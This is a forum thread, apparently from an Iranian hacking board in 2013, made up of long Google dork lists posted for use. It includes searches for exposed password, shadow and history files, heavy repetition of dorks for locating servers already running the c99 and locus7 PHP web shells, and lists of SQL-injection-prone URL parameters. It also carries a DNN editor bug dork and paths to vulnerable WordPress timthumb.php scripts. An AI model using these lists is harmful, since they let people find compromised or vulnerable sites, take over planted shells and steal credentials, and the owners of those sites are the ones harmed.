“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” applications -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

shadow1020
12-11-2013, 08:48 PM
ادامه



inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new mail."
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
"detected an internal error [IBM][CLI Driver][DB2/6000]""html allowed" guestbook
: vBulletin Version 1.1.5"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
("Indexed.By"|"Monitored.By") hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:"index.php" "site=sglinks"
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:php inurl:vAuthenticate
filetype:pl intitle:"Ultraboard Setup"
Gallery in configuration mode
Hassan Consulting's Shopping Cart Version 1.18
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MvBlog powered"
intitle:"Remote Desktop Web Connection"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"Terminal Services Web Connection"
intitle:"Uploader - Uploader v6" -pixloads.com
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
inurl:"/NSearch/AdminServlet"
inurl:"index.php? module=ew_filemanager"
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:"t="
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp + View Webcam User Accessing
allinurl:control/multiview
inurl:"ViewerFrame?Mode="
intitle:"WJ-NT104 Main Page"
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol"
"Duclassified" -site:duware.com "DUware All Rights reserved"
"duclassmate" -site:duware.com
"Dudirectory" -site:duware.com
"dudownload" -site:duware.com
"Elite Forum Version *.*"
"Link Department"
"sets mode: +k"
"your password is" filetype:log
"DUpaypal" -site:duware.com
"A syntax error has occurred" filetype:ihtml
"access denied for user" "using password"
"Chatologica MetaSearch" "stack tracking:"
"Index of /backup"
"ORA-00921: unexpected end of SQL command"
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
?intitle:index.of? mp3 name
inurl:user
inurl:vtund.conf intext:pass -cvs s
inurl:web
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
POWERED BY HIT JAMMER 1.0!
signin filetype:url
site:ups.com intitle:"Ups Package tracking" intext:"1Z ### ### ## #### ### #"
top secret site:mil
Ultima Online loginservers
VP-ASP Shop Administrators only
XAMPP "inurl:xampp/index"
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle:*.php?filename=*
allintitle:*.php?page=*

shadow1020
12-11-2013, 08:52 PM
inurl:c99.php

inurl:c99.php uid=0(root)

root c99.php

"Captain Crunch Security Team" inurl:c99

download c99.php

download c99.php

download c99.php

inurl:c99.php

inurl:c99.php

allinurl: c99.php

inurl:c99.php

allinurl: c99.php

inurl:"/c99.php"

allinurl: c99.php

inurl:c99.php

inurl:"c99.php" c99shell

inurl:c99.php uid=0(root)

c99shell powered by admin

c99shell powered by admin

inurl:"/c99.php"

inurl:c99.php

inurl:c99.php

inurl:c99.php

c99 shell v.1.0 (roots)

inurl:c99.php

allintitle: "c99shell"

inurl:"c99.php

inurl:"c99.php

allinurl: "c99.php"

inurl:c99.php

intitle:C99Shell v. 1.0 pre-release +uname

intitle:C99Shell v. 1.0 pre-release +uname

allinurl: "c99.php"

inurl:c99.php

inurl:"c99.php"

inurl:"c99.php"

inurl:c99.php

inurl:c99.php

inurl:c99.php

inurl:c99.php

inurl:"c99.php" c99shell

inurl:c99.php

inurl:"c99.php"

allinurl:c99.php

inurl:"/c99.php

inurl:c99.php?

inurl:/c99.php+uname

allinurl:"c99.php"

allinurl:c99.php

inurl:"c99.php"

inurl:"c99.php"

allinurl:c99.php

allinurl:c99.php?

allinurl:c99.php?

allinurl:c99.php?

"inurl:c99..php"

allinurl:c99.php

c99shell [file on secure ok ]?

inurl:c99.php

inurl:c99.php

inurl:c99.php

inurl:c99.php

inurl:c99.php

inurl:c99.php

inurl:c99.php

inurl:c99.php

powered by Captain Crunch Security Team

allinurl:c99.php

"c99.php" filetype:php

allinurl:c99.php

inurl:c99.php

allinurl:.c99.php

"inurl:c99.php"

c99. PHP-code Feedback Self remove

allinurl:c99.php

download c99.php

allinurl:c99.php

inurl:c99.php

allinurl: "c99.php"

allinurl:c99.php

allinurl:c99.php

c99shell

inurl:c99.php

inurl:c99.php

intitle:C99Shell v. 1.0 pre-release +uname

allinurl:"c99.php"

inurl:c99.php

inurl:c99.php

inurl:c99.php

inurl:c99.php

safe-mode: off (not secure) drwxrwxrwx c99shell

inurl:/c99.php

inurl:"c99.php"

inurl:c99.php

inurl:c99.php

c99.php download

inurl:c99.php

inurl:"c99.php"

inurl:/c99.php

inurl:"c99.php?"

inurl:c99.php

inurl:c99.php

files/c99.php

c99shell filetype:php -echo

c99shell powered by admin

inurl:c99.php

inurl:c99.php

inurl:"c99.php"

inurl:c99.php uid=0(root)

allinurl:c99.php

inurl:"c99.php"

inurl:"c99.php"

inurl:"/c99.php" intitle:"C99shell"

inurl:"/c99.php" intitle:"C99shell"

inurl:"/c99.php" intitle:"C99shell"

C99Shell v. 1.0 pre-release build #5

inurl:c99.php

inurl:c99.php

--[ c99shell v. 1.0 pre-release build #16

c99shell linux infong

c99shell linux infong

C99Shell v. 1.0 pre-release build

!C99Shell v. 1.0 beta!

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99shell v. 1+Safe-mode: OFF (not secure)

"C99Shell v. 1.0 pre-release build "

intitle:c99shell +filetype:php

inurl:c99.php

intitle:C99Shell v. 1.0 pre-release +uname

"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

intitle:!C99Shell v. 1.0 pre-release build #16! root

!C99Shell v. 1.0 pre-release build #5!

inurl:"c99.php"

C99Shell v. 1.0 pre-release build #16!

c99shell v. 1.0 pre-release build #16

intitle:c99shell intext:uname

allintext:C99Shell v. 1.0 pre-release build #12

c99shell v. 1.0 pre-release build #16

--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--

allinurl: "c99.php"

allinurl: "c99.php"

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

"c99shell v 1.0"

ftp apache inurl:c99.php

c99shell+v.+1.0 16

C99Shell v. 1.0 pre-release build #16 download

intitle:c99shell "Software: Apache"

allinurl: c99.php

allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

powered by Captain Crunch Security Team

powered by Captain Crunch Security Team

!C99Shell v. 1.0 pre-release build #5!

c99shell v. 1.0 release security

c99shell v. 1.0 pre-release build

inurl:c99.php

c99shell [file on secure ok ]?

C99Shell v. 1.3

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

inurl:c99.php uid=0(root)

powered by Captain Crunch Security Team

C99Shell v. 1.0 pre-release build #16

c99shell[on file]ok

c99shell[file on ]ok

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

inurl:c99.php

"C99Shell v. 1.0 pre"

=C99Shell v. 1.0 pre-release

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

c99shell v. pre-release build

inurl:c99.php c99 shell

inurl:c99.php c99 shell

powered by Captain Crunch Security Team

inurl:c99.php

inurl:c99.php

!C99Shell v. 1.0 pre-release build #5!

intitle:"c99shell" filetype:php root

intitle:"c99shell" Linux infong 2.4

C99Shell v. 1.0 beta !

C99Shell v. 1.0 pre-release build #

inurl:"c99.php"

allintext:C99Shell v. 1.0 pre-release build #12

"C99Shell v. 1.0 pre"

powered by Captain Crunch Security Team

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

inurl:/c99.php?

allinurl:c99.php

intitle:C99Shell pre-release

inurl:"c99.php"

powered by Captain Crunch Security Team

inurl:c99.php

C99Shell v. 1.0 pre-release build #16!

allinurl:c99.php

C99Shell v. 1.0 pre-release build #16 administrator

intitle:c99shell filetype:php

powered by Captain Crunch Security Team

powered by Captain Crunch Security Team

C99Shell v. 1.0 pre-release build #12

c99shell v.1.0

allinurl:c99.php

"c99shell v. 1.0 pre-release build"

inurl:"c99.php" filetype:php

"c99shell v. 1.0 "

ok c99.php

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

c99shell v. 1.0 pre-release build #16 |

!C99Shell v. 1.0 pre-release build #5!

!C99Shell v. 1.0 pre-release build #5!

allinurl:/c99.php

powered by Captain Crunch Security Team

inurl:c99.php

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

inurl:c99.php

powered by Captain Crunch Security Team

inurl:c99.php

C99Shell v. 1.0 pre-release

inurl:c99.php

inurl:c99.php ext:php

inurl:"c99.php"

allinurl:"c99.php"

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

powered by Captain Crunch Security Team

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"

C99Shell v. 1.0 pre-release build #16 software apache

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

"c99shell v 1.0"

inurl:"c99.php"

allintitle: C99shell filetype:php

C99Shell v. 1.0 pre-release build #16!

"c99shell v. 1.0 pre-release"

c99shell v. 1.0 pre-release build #5

allinurl:"c99.php" filetype:php

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!C99Shell v. 1.0 pre-release build #16!



1 0.39% x2300 locus7shell v. 1.0a beta

shadow1020
12-11-2013, 08:55 PM
inurl:c99.php

intitle:C99Shell v. 1.0 pre-release +uname

inurl:c99.php

c99shell v. 1.0

allinurl: c99.php

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--

inurl:"/c99.php"

c99shell +uname

c99shell php + uname

c99shell php + uname


allinurl:c99.php

!C99Shell v. 1.0 pre-release build #5!

C99Shell v.1.0 pre-release

Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

inurl:c99.php

intitle:c99shell filetype:php

"Encoder Tools Proc. FTP brute"

"c99" filetype:php intext:"Safe-Mode: OFF"

c99shell v. 1.0 pre

inurl:c99.php

intitle:c99shell uname -bbpress

intitle:"index.of" c99.php

inurl:admin/files/

intitle:"index of /" "c99.php"

intitle:"index of" intext:c99.php

intitle:index.of c99.php

intitle:"index of" + c99.php

intitle:index/of file c99.php

intitle:index/of file c99.php

index of /admin/files/

intitle:"Index of/"+c99.php

c99.php "intitle:Index of "

c99.php "intitle:Index of "

c99.php "intitle:Index of "

intitle:index.of c99.php

img/c99.php

intitle:index.of c99.php

img.c99.php

intitle:"Index of/"+c99.php

"index of /" c99.php

c99.php

intitle:"Index of" c99.php

"index of" c99.php

"Index of/"+c99.php[/HIDE]
11 13.41% powered by captain crunch security team

6 7.32% locus7shell

4 4.88% shell

3 3.66% kuwait hacker

3 3.66% php safe-mode bypass (list directories):

3 3.66% safe-mode: off (not secure)

3 3.66% safe-mode: off (not secure) drwxrwxrwx c99shell

3 3.66% startpar -f

2 2.44% hs_kuwait.php

2 2.44% lejeune interpolate

2 2.44% name asc. size · modify · owner/group · perms action

2 2.44% shell c99 ccteam.r

1 1.22% .phpact=f shell

1 1.22% 00007458 zip

1 1.22% allintext:�safe-mode: off (not secure)

1 1.22% allintitle: \locus7shell\

1 1.22% allintitle: c99memoryl

1 1.22% allinurl:upload3.php

1 1.22% astro acrobat

1 1.22% basel

1 1.22% basel stellar library

1 1.22% c99memory

1 1.22% c99memoryl

1 1.22% c99shell v. 1.0 pre-release build #16

1 1.22% class-efem

1 1.22% efemerides del 22 de abril

1 1.22% encoder bind proc. ftp brute sec. sql php-

1 1.22% encoder bind proc. ftp brute sec. sql php-code feedback

1 1.22% encoder bind proc. ftp brute sec. sql php-code update feedback

1 1.22% encoder tools proc. ftp brute sec. sql php-code update feedback

1 1.22% filetype:php shell

1 1.22% foreach (array(sortsql_sort) as $v)

1 1.22% i.s.s.w team …

1 1.22% intitle:locus7shell

1 1.22% inurl:ftpquickbrute

1 1.22% inurl:php drwxrwxr-x ftp brute sql

1 1.22% lejeune interpolation

1 1.22% lejuene interpolate

1 1.22% lmgrd_start 47

1 1.22% mysqld usage of cpu suse [Only registered and activated users can see links]

1 1.22% php echo getenv

1 1.22% php4 “registered stream socket transports�

1 1.22% powered by captain crunch filetype:php

1 1.22% safe mode : off (not secure)

1 1.22% safe-mode:

1 1.22% select action/file-type:

1 1.22% software make dir upload file safe-mode

1 1.22% uid=30([Only registered and activated users can see links]) gid=8(www)




64 24.81% locus7shell

31 12.02% intitle:locus7shell

12 4.65% locus7shell filetype:php

8 3.10% locus7shell uname

6 2.33% allintitle: locus7shell

5 1.94% - locus7shell

5 1.94% intitle:- locus7shell

5 1.94% x2300 locus7shell

4 1.55% –[ x2300 locus7shell v. 1.0a beta modded by #!physx^ |

4 1.55% allintitle:- locus7shell

4 1.55% intitle: - locus7shell

4 1.55% safe-mode: off (not secure)

3 1.16% locus7shell 2008

3 1.16% shell x2300 locus7shell

2 0.78% .br - locus7shell

2 0.78% .us/images/0/588/mo_656_656.swf

2 0.78% allintext:--[ x2300 locus7shell v. modded by #!physx^

2 0.78% allintitle: - locus7shell

2 0.78% allintitle: locus7shell ext:php

2 0.78% allintitle:locus7shell

2 0.78% allintitle:locus7shell filetype:php

2 0.78% free locus7shell

2 0.78% ftp brute sec. sql php-code

2 0.78% inurl:act=sql

2 0.78% locus7s off secure

2 0.78% locus7s shell

2 0.78% locus7shell apache

2 0.78% locus7shell edition 2008

2 0.78% locus7shell filetype: 'php'

2 0.78% locus7shell index:php

2 0.78% locus7shell linux 2008

2 0.78% locus7shell modified

2 0.78% php safe-mode bypass (list directories):

2 0.78% safe-mode: off (not secure) drwxrwxrwx locus7shell

1 0.39% %%% locus7shell

1 0.39% - locus7shell windows

1 0.39% --[ x2300 locus7shell v. 1.0a beta modded by #!physx^ | [Only Registered Users Can See LinksClick Here To Register]

1 0.39% --[ x2300 locus7shell v. modded by #!physx^ | [Only Registered Users Can See LinksClick Here To Register] |

1 0.39% --[ x2300 locus7shell v.1.0a beta modded by #!physx^ | [Only Registered Users Can See LinksClick Here To Register]

1 0.39% /locus7shell/

1 0.39% [enumerate] [encoder] [tools] [proc.] [ftp brute] [sec.] [sql]

1 0.39% allintext: locus7shell v. 1.0a beta

1 0.39% allintext:�safe-mode: off (not secure)�

1 0.39% allintitle: \locus7shell\

1 0.39% allinurl: .phpact=ls

1 0.39% apache aix aixthread_scope

1 0.39% ar ba locus7shell

1 0.39% basel

1 0.39% basel 3.1 library

1 0.39% basel interpolation

1 0.39% basel interpolation engine

1 0.39% basel spectra

1 0.39% c99memoryl

1 0.39% encoder bind proc. ftp brute sec. sql php-code feedback self re

1 0.39% filetype locus7shell

1 0.39% interpolation engine

1 0.39% intext:” safe-mode:off (not secure)”

1 0.39% intitle:- locus7shell’

1 0.39% intitle:c99memoryl inurl:.php

1 0.39% intitle:locus7shell by filetype:php

1 0.39% intitle:locus7shell drwxr-xr-x

1 0.39% inurl:.phpact=ls

1 0.39% inurl:act intext:full hexdump

1 0.39% license.dat idl server bypass

1 0.39% locus7s uname

1 0.39% locus7shell 2.0

1 0.39% locus7shell [file on secure ok ] drwxrwxrwx

1 0.39% locus7shell intext:x2300 intext:milw0rm.it enumerate uname

1 0.39% locus7shell inurl:php

1 0.39% locus7shell linux

1 0.39% locus7shell linux 2006

1 0.39% locus7shell safe-mode: off (not secure) drwxrwxrwx

1 0.39% locus7shell self remove drwxrwxrwx

1 0.39% locus7shell v. 1.0

1 0.39% locus7shell windows 2008

1 0.39% locus7shell-

1 0.39% make dir make file ok read files locus7shell

1 0.39% modded locus7shell

1 0.39% php safe-mode bypass (list directories)

1 0.39% php safe-mode bypass (read file)

1 0.39% php safe-mode bypass (read files)

1 0.39% safe-mode: apache uname -a: linux filetype:php

1 0.39% safe-mode: off (not secure) / tmp/ drwxrwxrwx

1 0.39% safe-mode: off (not secure) locus7shell

1 0.39% safe_mode: off drwxr-xr-x locus7shell

1 0.39% software: safe-mode: off (not secure) your ip: - server ip: [ft

1 0.39% suhosin 5.1.2

1 0.39% sybase aixthread_scope

1 0.39% uploads/ drwxrwxrwx

1 0.39% warning kernel may be alerted using higher levels safe mode

1 0.39% x2300 locus7shell download

1 0.39% x2300 locus7shell modified by #!physx^

1 0.39% x2300 locus7shell v. 1.0a

shadow1020
12-11-2013, 08:57 PM
shop/product_details.php?ProdID=

usar/productDetail.php?prodID=

products/display_product.php?product_id=

products.php?cat=

cardIssuance/product.php?pid=

product.php?proid=

products.php?parent=

products.php?catId=

productDetail.php?prodID=

productlist.php?fid=

products.php?mainID=

products.php?cat=

product_info.php?products_id=

product_detail.php?prodid=

catalog/product_info.php?products_id=

product_info.php?products_id=

products.php?cat=

product.search.php?proid=

productlist.php?id=

product.php?proid=

product.php?pid=

product_reviews.php?feature_id=

product.php?product_id=

product.php?productid=

item.php?id=

directorylisting.php?cat=

historical/stock.php?symbol=

viewtopic.php?pid=

cc/showthread.php?t=

category/index_pages.php?category_id=

files.php?cat=

vb/showthread.php?t=

newsitem.php?newsid=

categories.php?parent_id=

products.php?cat=

kshop/home.php?cat=

publications/publication.php?id=

category.php?Category_ID=

item.php?ID=

category.php?catID=

print.php?id=

Range.php?rangeID=

en/mobile_phone.php?ProdID=

news-item.php?newsID=

newsitem.php?newsID=

newsitem.php?newsID=

newsitem.php?newsID=

category.php?id_category=

en/procurement/news-item.php?newsID=

newsitem.php?newsID=

product-list.php?id=

pages/product.php?product_id=

bug.php?id=

showthread.php?p=

photo_view.php?id=

index.php?option=

event/detail.php?id=

fatcat/artistInfo.php?id=

viewtopic.php?id=

showthread.php?t=

index.php?showtopic=

news.php?id=

news.php?id=

news/index.php?ID=

article.php?id=

h4kurd/showthread.php?tid=

faq/question.php?Id=

forums/index.php?topic=

rss.php?id=

tak/index.php?module=

stafflist/profile.php?id=

manual.php?product=

events/event.php?id=

index.php?id=

detail.php?id=

detail.php?id=

show.php?id=

contentok.php?id=

event_details.php?id=

socsci/events/full_details.php?id=

index.php?id=

etemplate.php?id=

index.php?id=

anj.php?id=

anj.php?id=

forum/viewtopic.php?t=

profile.php?id=

pubs_more2.php?id=

content.php?id=

opportunities/bursary.php?id=

opportunities/event.php?id=

vb/showthread.php?p=

events_more.php?id=

product_detail.cfm?id=

events/index.php?id=

articles.php?id=

index.php?id=

package_info.php?id=

news_more.php?id=

productinfo.php?id=

pageType2.php?id=

news.php?id=

news.php?id=

artform.cfm?id=

article.php?id=

product.php?id=

index.php?id=

event_details.php?id=

productDetails.php?id=

faq.php?id=

?id=

gig.php?id=

showthread.php?t=

faq.php?q_id=

events.php?pid=

profiles/profile.php?profileid=

ProductDetails.php?id=

about.php?id=

news-story.php?id=

index.php?id=

display-sunsign.php?id=

news.php?id=

product_page.php?id=

news/news_detail.php?id=

yarndetail.php?id=

airactivity.cfm?id=

earthactivity.cfm?id=

index.php?id=

news.php?id=

Doncaster/events/event.php?ID=

index.php?id=

index.php?id=

user/AboutAwardsDetail.php?ID=

hw_reviews.php?id=

page.php?area_id=

view_company.php?id=

site/marketing_article.php?id=

articles.php?id=

release.php?id=

news.php?display=

index.php?id=

current/diary/story.php?id=

meetings/presentations.php?id=

product.php?fdProductId=

featuredetail.php?id=

featuredetail.php?id=

news.php?id=

shopping/index.php?id=

feature.php?id=

Links/browse.php?id=

Links/browse.php?id=

issue.php?id=

index.php?id=

product_details.php?id=

article.php?id=

index.php?id=

product.php?brand=

productpage.php?ID=

newsite/events.php?id=

show_upload.php?id=

display_user.php?ID=

productinfo.php?id=

index.php?id=

news/details.php?id=

contact_details.php?id=

news.php?id=

news.php?id=

news.php?id=

viewevent.php?id=

news.php?id=

news.php?id=

events/events.php?id=

news/news.php?id=

news/news.php?id=

modsdetail.php?id=

fitxa.php?id=

contact.php?id=

latestnews.php?id=

mylink.php?id=

products_detail.php?id=

products_detail.php?id=

products_detail.php?id=

shadow1020
12-11-2013, 08:59 PM
اینم یه دورک باگ dnn که تارگت های اینگیلیسی رو میاره بالا !


site:.uk inurl:"Fck/fcklinkgallery.aspx

shadow1020
12-11-2013, 09:02 PM
/wp-content/themes/yamidoo/scripts/timthumb.php “/themes/yamidoo”
/wp-content/themes/zenko/scripts/timthumb.php “/themes/zenko”
/wp-content/themes/listings/timthumb.php “/themes/listings”
/wp-content/themes/telegraph/scripts/timthumb.php “/themes/telegraph”
/wp-content/themes/freshine/includes/timthumb.php “/themes/freshine”
/wp-content/themes/Galleria/timthumb.php “/themes/Galleria”
/wp-content/themes/MyApp/timthumb.php “/themes/MyApp”
/wp-content/themes/Minimal/timthumb.php “/themes/Minimal”
/wp-content/themes/LightSource/timthumb.php “/themes/LightSource”
/wp-content/themes/LightBright/timthumb.php “/themes/LightBright”
/wp-content/themes/Influx/timthumb.php “/themes/Influx”
/wp-content/themes/GrungeMag/timthumb.php “/themes/GrungeMag”
/wp-content/themes/Glow/timthumb.php “/themes/Glow”
/wp-content/themes/EarthlyTouch/timthumb.php “/themes/EarthlyTouch”
/wp-content/themes/Deviant/timthumb.php “/themes/Deviant”
/wp-content/themes/Apz.v1.0.2/thumb.php “/themes/Apz.v1.0.2?
/wp-content/themes/Apz/thumb.php “/themes/Apz”
/wp-content/themes/ArtSee/timthumb.php “/themes/ArtSee”
/wp-content/themes/AskIt/timthumb.php “/themes/AskIt”
/wp-content/themes/Avenue/timthumb.php “/themes/Avenue”
/wp-content/themes/Bluemist/timthumb.php “/themes/Bluemist”
/wp-content/themes/Basic/timthumb.php “/themes/Basic”
/wp-content/themes/Bluesky/timthumb.php “/themes/Bluesky”
/wp-content/themes/Bold/timthumb.php “/themes/Bold”
/wp-content/themes/BusinessCard/timthumb.php “/themes/BusinessCard”
/wp-content/themes/CherryTruffle/timthumb.php “/themes/CherryTruffle”
/wp-content/themes/Cion/timthumb.php “/themes/Cion”
/wp-content/themes/DailyNotes/timthumb.php “/themes/DailyNotes”
/wp-content/themes/Quadro/timthumb.php “/themes/Quadro”
/wp-content/themes/Simplism/timthumb.php “/themes/Simplism”
/wp-content/themes/Wooden/timthumb.php “/themes/Wooden”
/wp-content/themes/abstract/thumb.php “/themes/abstract”
/wp-content/themes/ambience/thumb.php “/themes/ambience”
/wp-content/themes/antisocial/thumb.php “/themes/antisocial”
/wp-content/themes/backstage/thumb.php “/themes/backstage”
/wp-content/themes/bigeasy/thumb.php “/themes/bigeasy”
/wp-content/themes/blaxk “/themes/blaxk”
/wp-content/themes/mortar/thumb.php “/themes/mortar”
/wp-content/themes/geoplaces/thumb.php “/themes/geoplaces”
/wp-content/themes/blogtheme/thumb.php “/themes/blogtheme”
/wp-content/themes/busybee/thumb.php “/themes/busybee”
/wp-content/themes/bueno/thumb.php “/themes/bueno”
/wp-content/themes/cityguide/thumb.php “/themes/cityguide”
/wp-content/themes/cinch/thumb.php “/themes/cinch”
/wp-content/themes/cushy/thumb.php “/themes/cushy”
/wp-content/themes/dailyedition/thumb.php “/themes/dailyedition”
/wp-content/themes/delegate/thumb.php “/themes/delegate”
/wp-content/themes/diarise/thumb.php “/themes/diarise”
/wp-content/themes/digitalfarm/thumb.php “/themes/digitalfarm”
/wp-content/themes/eVid/timthumb.php “/themes/eVid”
/wp-content/themes/exposure/thumb.php “/themes/exposure”
/wp-content/themes/featurepitch/thumb.php “/themes/featurepitch”
/wp-content/themes/f0101/thumb.php “/themes/f0101?
/wp-content/themes/geometric/thumb.php “/themes/geometric”
/wp-content/themes/eStore/timthumb.php “/themes/eStore”
/wp-content/themes/eGamer/timthumb.php “/themes/eGamer”
/wp-content/themes/object/thumb.php “/themes/object”
/wp-content/themes/EarthlyTouch/timthumb.php “/themes/EarthlyTouch”
/wp-content/themes/InterPhase/timthumb.php “/themes/InterPhase”
/wp-content/themes/Glider/timthumb.php “/themes/Glider”
/wp-content/themes/Magnificent/timthumb.php “/themes/Magnificent”
/wp-content/themes/OnTheGo/timthumb.php “/themes/OnTheGo”
/wp-content/themes/magazeen/timthumb.php “/themes/magazeen”
/wp-content/themes/arras-theme/library/timthumb.php “/themes/arras-theme”
/wp-content/themes/13Floor/timthumb.php “/themes/13Floor”
/wp-content/themes/Basic/timthumb.php “/themes/Basic”
/wp-content/themes/ArtSee/timthumb.php “/themes/ArtSee”
/wp-content/themes/DelicateNews/timthumb.php “/themes/DelicateNews”
/wp-content/themes/EspOptimizePress/timthumb.php “/themes/EspOptimizePress”
/wp-content/themes/cruz/scripts/timthumb.php “/themes/cruz/”
/wp-content/themes/denizy/timthumb.php “/themes/denizy”
/wp-content/themes/executive/tools/timthumb.php “/themes/executive”
/wp-content/themes/centita/timthumb.php “/themes/centita”
/wp-content/themes/studiobox/timthumb.php “/themes/studiobox”
/wp-content/themes/newspress/thumb.php “/themes/newspress”
/wp-content/themes/flashnews/thumb.php “/themes/flashnews”
/wp-content/themes/livewire/thumb.php “/themes/livewire”
/wp-content/themes/busybee/thumb.php “/themes/busybee”
/wp-content/themes/themorningafter/thumb.php “/themes/themorningafter”
/wp-content/themes/thesis_18/lib/scripts/thumb.php “/themes/thesis_18/”
/wp-content/themes/groovyphoto/thumb.php “/themes/groovyphoto”
/wp-content/themes/premiumnews/thumb.php “/themes/premiumnews”
/wp-content/themes/wordcult2/scripts/thumb.php “/themes/wordcult2?
/wp-content/themes/Lycus/timthumb.php “/themes/Lycus”
/wp-content/themes/Karma/timthumb.php “/themes/Karma”
/wp-content/themes/typebased/thumb.php “/themes/typebased”
/wp-content/themes/openair/thumb.php “/themes/openair”
/wp-content/themes/digitalfarm/thumb.php “/themes/digitalfarm”
/wp-content/themes/CherryTruffle/timthumb.php “/themes/CherryTruffle”
/wp-content/themes/thestation/thumb.php “/themes/thestation”
/wp-content/themes/especial/libraries/timthumb.php “/themes/especial”
/wp-content/themes/qualifire/scripts/timthumb.php “/themes/qualifire”
/wp-content/themes/boast/thumb.php “/themes/boast”
/wp-content/themes/sealight/thumb.php “/themes/sealight”
/wp-content/themes/headlines2/thumb.php “/themes/headlines2?
/wp-content/themes/headlines/thumb.php “/themes/headlines”
/wp-content/themes/gothamnews/thumb.php “/themes/gothamnews”
/wp-content/themes/deliciousmagazine/thumb.php “/themes/deliciousmagazine”
/wp-content/themes/boldnews/thumb.php “/themes/boldnews”
/wp-content/themes/bluevise/scripts/timthumb.php “/themes/bluevise”
/wp-content/themes/monotone/thumb.php “/themes/monotone”
/wp-content/themes/metamorphosis/thumb.php “/themes/metamorphosis”
/wp-content/themes/Sabuy/timthumb.php “/themes/Sabuy”
/wp-content/themes/duotive-three/includes/timthumb.php “/themes/duotive-three”
/wp-content/themes/duotive-fortune/includes/timthumb.php “/themes/duotive-fortune”
/wp-content/themes/rttheme12/timthumb.php “/themes/rttheme12?
/wp-content/themes/hyperion/inc/timthumb.php “/themes/hyperion”
/wp-content/themes/wp-creativix/scripts/timthumb.php “/themes/wp-creativix”
/wp-content/themes/WebHosting/thumb.php “/themes/WebHosting”
/wp-content/themes/thick/thumb.php “/themes/thick”
/wp-content/themes/vibrantcms/thumb.php “/themes/vibrantcms”
/wp-content/themes/obscorp-2.0.1/obscorp/timthumb.php “/themes/obscorp-2.0.1/”
/wp-content/themes/obscorp/obscorp/timthumb.php “/themes/obscorp”
